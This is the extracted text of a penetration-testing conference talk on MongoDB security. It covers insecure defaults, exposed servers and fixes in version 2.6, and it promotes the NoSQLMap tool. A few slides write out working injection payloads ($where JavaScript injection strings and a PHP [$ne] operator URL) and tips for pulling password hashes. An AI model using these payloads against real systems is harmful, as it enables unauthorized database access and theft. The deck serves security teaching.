Download - Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini [email protected] @tcstoolhax0r
![Page 2: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/2.jpg)
DISCLAIMER
This presentation contains jokes from the movie Blazing Saddles. The presenter takes no responsibility if you haven’t
seen one of the greatest films ever made and find none of his jokes funny.
![Page 3: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/3.jpg)
Let’s talk about Mongo…But not this Mongo…
![Page 4: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/4.jpg)
THIS Mongo
![Page 5: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/5.jpg)
However they’re kind of the same…
BigPowerful
Blindly trust input Do anything they’re told
Don’t understand encryption
![Page 6: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/6.jpg)
• 49% of LinkedIn member profiles mentioning NoSQL technologies reference MongoDB1.
• Frequent releases with lots of big changes“Generally, changes in the release series (e.g. 2.2 to 2.4) mark the introduction of new features that may break backwards compatibility” 2.
• 10Gen is oblivious to security issues:“…We were on with…the MongoDB guys talking about the security of the
platform, and…it was really clear that they just didn’t care, because their customers weren’t asking for it.” -Rich Mogull, Security Weekly episode 3453.
1-http://www.mongodb.com/press/mongodb-certification-now-available-developers-and-dbas2-http://docs.mongodb.org/manual/release-notes/3-http://pauldotcom.com/wiki/index.php/Episode345
![Page 7: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/7.jpg)
NoSQL Primer-Structure
Traditional SQL Mongo NoSQLDatabases
Tables
Columns/Types
Rows/Records
Databases
Collections
Documents
Key-Value pairs
![Page 8: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/8.jpg)
NoSQL Primer-Data
Traditional SQL:
Mongo NoSQL:{“firstname” : “John”, “lastname” : “Doe”, “widgets” : 5}or{“firstname” : “John”, “lastname” : “Doe”, “widgets” : “five”}or{“firstname” : “John”, “lastname”, : “Doe”, “widgets” : 5, “foo” :
“bar”}
firstName (char) lastName (varchar) widgets (int)
John Doe 5
![Page 9: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/9.jpg)
NoSQL Primer-Queries
Traditional SQL:SELECT email FROM users WHERE username = “joe”;
Mongo NoSQL:db.users.find({“username” : “joe”}, {“email” : 1})
![Page 10: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/10.jpg)
The Good
• Built for performance• Highly scalable• Dynamic and flexible
![Page 11: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/11.jpg)
The Bad
• No standards between NoSQL platforms (you have to choose the right DB for the right job)
• Security is weak and inconsistently applied
![Page 12: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/12.jpg)
The Disturbing
• No authentication required by default• Weak or plaintext password storage• Cleartext network communication from client to server• No data encryption• “Use this only in trusted environments” (yeah right)• Reliance on the clients/drivers for security/functionality
![Page 13: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/13.jpg)
NoSQL=No Auth (at least by default)
• Shodan: 33,575 Mongo default management ports exposed to the Internet (Feb 2014, Project Un1c0rn has more!)
• How many have the default of no authentication on?
![Page 14: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/14.jpg)
And…
Total: 33,575 serversUnauthenticated: 18,979 (56.5%)
(Most of the others were offline, not authenticated)
RTFM:“The most effective way to reduce risk for MongoDB deployments is to run
your entire MongoDB deployment, including all MongoDB components (i.e. mongod, mongos and application instances) in a trusted environment.”
![Page 15: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/15.jpg)
Conclusion
At least 18,979 people believe the Internet is a trusted environment.
![Page 16: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/16.jpg)
Pen Testing Fun• /etc/mongod.conf-DB config
– The best part: Disable ALL authentication (except for the web interface for some reason) by commenting out auth=true and kicking the service
• Run() acts as a shell (from wherever you launch the Mongo client from)
• Entering a command with no parameters shows the Javascript being executed in the shell
• system.users-Usernames and weak password hashes• System.indexes-Key fields for speedy searching (probably important
stuff)• TCP 28017-Web management interface on by default (before 2.6)• An optional REST API when enabled allows for querying databases
through the web management
![Page 17: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/17.jpg)
NoSQL = No Encryption
• Server/Client communications (including authentication) occur in PLAIN TEXT
• Passwords encrypted with MD5, but only use nonce over the wire (not at rest).
• Data encryption? You’re on your own.
(More on this to come…)
![Page 18: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/18.jpg)
NoSQL = No SQL Injection (not)
Changing syntax != no vulnerabilitiesTraditional SQL Injection:
‘ OR 1=1 --
MongoDB $where query injection( <=2.2):a‘; return db.ddlkad.find(); var dummy=‘a
MongoDB $where query injection(<=2.4):a‘; return this.adfjda != djakflkdkl; var dummy=‘a
ora‘; return 1=1; var dummy=‘a
ora’; return true; var dummy = ‘a
![Page 19: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/19.jpg)
Client Issues
PHP-What you Supply:http://somesite.com/id[$ne]=something
What PHP Sees:{“$ne”=>”something”}
What MongoDB Sees:“Give me everything back that is not equal to ‘something’”
![Page 20: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/20.jpg)
Credit where Credit is Due
On 4/8/2014, MongoDB 2.6 was released:• New authentication methods including certificates and
external authentication sources.• Web interface is disabled by default.• Granular role based access control.• Auditing of schema, replica sets,
authentication/authorization, general operations.• Encryption in transit over SSL.• Encryption at rest provided by Gazzang at the database and
field levels.
![Page 21: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/21.jpg)
But…• Still no authentication by default.• The default distribution of MongoDB 2.6 does NOT contain
support for SSL (recompile the whole thing locally or buy the enterprise version for 7,500 bucks).
• Gazzang encryption at rest isn’t free either.• Password hashing is still using the same weak algorithm as
previous versions.
![Page 22: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/22.jpg)
NoSQLMap
• Project home page: www.nosqlmap.net• Automate all this stuff we just talked about
and more.• Always looking for more help!!!
![Page 23: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/23.jpg)
Final Thoughts
• NoSQL databases can be a great tool, but you have to understand what you get.
• Devs can (and will) make the same mistakes they’ve been making for years.
• The default settings will get left on.• Good application layer security is key since the
database platform doesn’t provide any.
![Page 24: Making Mongo Cry: NoSQL for Penetration Testers Russell Butturini tcstool@gmail.com @tcstoolhax0r](https://reader035.vdocuments.mx/reader035/viewer/2022062318/551b716f550346ae7a8b6328/html5/thumbnails/24.jpg)
Questions?
NoSQLMap home page:www.nosqlmap.net
Project mailbox:[email protected]
Me:@tcstoolhax0r, [email protected]